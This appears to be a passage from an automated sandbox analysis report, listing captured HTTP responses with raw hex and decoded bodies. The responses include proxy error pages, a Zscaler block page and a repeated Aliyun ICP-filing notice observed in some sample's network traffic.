72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/3.5.27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 3832X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 37 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2017 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>E
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Content-Type,AccessToken,X-CSRF-Token, Authorization, TokenAccess-Control-Allow-Methods: POST, GET, OPTIONS, PUT, DELETE,UPDATEAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length, Access-Control-Allow-Origin, Access-Control-Allow-Headers, Content-TypeContent-Type: text/plain; charset=utf-8Set-Cookie: uuid=94690398-de0e-11ee-9749-fa20201ff994; Path=/; Max-Age=8640000; HttpOnlyX-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:29 GMTContent-Length: 31Data Raw: 75 6e 73 75 70 70 6f 72 74 65 64 20 70 72 6f 74 6f 63 6f 6c 20 73 63 68 65 6d 65 20 22 22 0a Data Ascii: unsupported protocol scheme ""
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/htmlServer: Zscaler/6.2Cache-Control: no-cacheAccess-Control-Allow-Origin: *Content-length: 13597Data Raw: 3c 21 2d 2d 23 20 49 64 3a 20 63 6c 6f 73 65 64 70 72 6f 78 79 2e 68 74 6d 6c 20 32 38 35 31 34 34 20 32 30 32 31 2d 30 36 2d 31 36 20 30 35 3a 30 32 3a 30 36 5a 20 73 7a 68 61 6e 67 20 2d 2d 3e 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 63 2e 6f 72 67 2f 54 52 2f 31 39 39 39 2f 52 45 43 2d 68 74 6d 6c 34 30 31 2d 31 39 39 39 31 32 32 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 5a 73 63 61 6c 65 72 20 6d 61 6b 65 73 20 74 68 65 20 69 6e 74 65 72 6e 65 74 20 73 61 66 65 20 66 6f 72 20 62 75 73 69 6e 65 73 73 65 73 20 62 79 20 70 72 6f 74 65 63 74 69 6e 67 20 74 68 65 69 72 20 65 6d 70 6c 6f 79 65 65 73 20 66 72 6f 6d 20 6d 61 6c 77 61 72 65 2c 20 76 69 72 75 73 65 73 2c 20 61 6e 64 20 6f 74 68 65 72 20 73 65 63 75 72 69 74 79 20 74 68 72 65 61 74 73 2e 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 74 69 74 6c 65 3e 49 6e 74 65 72 6e 65 74 20 53 65 63 75 72 69 74 79 20 62 79 20 5a 73 63 61 6c 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 76 61 72 20 64 65 66 4c 61 6e 67 20 3d 20 27 65 6e 5f 55 53 27 3c 2f 73 63 72 69 70 74 3e 0a 3c 21 2d 2d 3c 69 6d 67 20 61 6c 74 3d 22 5a 73 63 61 6c 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 67 69 6e 2e 7a 73 63 6c 6f 75 64 2e 6e 65 74 2f 69 6d 67 5f 6c 6f 67 6f 5f 6e 65 77 31 2e 70 6e 67 22 3e 2d 2d 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 62 6f 64 79 20 7b 0a 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 33 65 33 65 33 3b 0a 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 0a 63 6f 6c 6f 72 3a 23 34 42 34 46 35 34 3b 0a 7d 0a 61 20 7b 0a 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 3b 0a 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 0a 63 6f 6c 6f 72 3a 23 30 30 39 64 64 30 3b 0a 7d 0a 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 30 70 78 3b 0a 7d 0a 74 64 20 74 61 62 6c 65 20 7b 0a 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 0a 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 0a 7d 0a 69 6d 67 20 7b 0a 6d
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/4.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:29 GMTContent-Type: text/html;charset=utf-8Content-Length: 5X-Squid-Error: TCP_RESET 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from proxy.wakoopa.comVia: 1.1 proxy.wakoopa.com (squid/4.7)Connection: keep-aliveData Raw: 72 65 73 65 74 Data Ascii: reset
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service Unavailablex-envoy-overloaded: truecontent-length: 81content-type: text/plaindate: Sat, 09 Mar 2024 11:54:18 GMTserver: svcproxyconnection: closeData Raw: 75 70 73 74 72 65 61 6d 20 63 6f 6e 6e 65 63 74 20 65 72 72 6f 72 20 6f 72 20 64 69 73 63 6f 6e 6e 65 63 74 2f 72 65 73 65 74 20 62 65 66 6f 72 65 20 68 65 61 64 65 72 73 2e 20 72 65 73 65 74 20 72 65 61 73 6f 6e 3a 20 6f 76 65 72 66 6c 6f 77 Data Ascii: upstream connect error or disconnect/reset before headers. reset reason: overflow
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
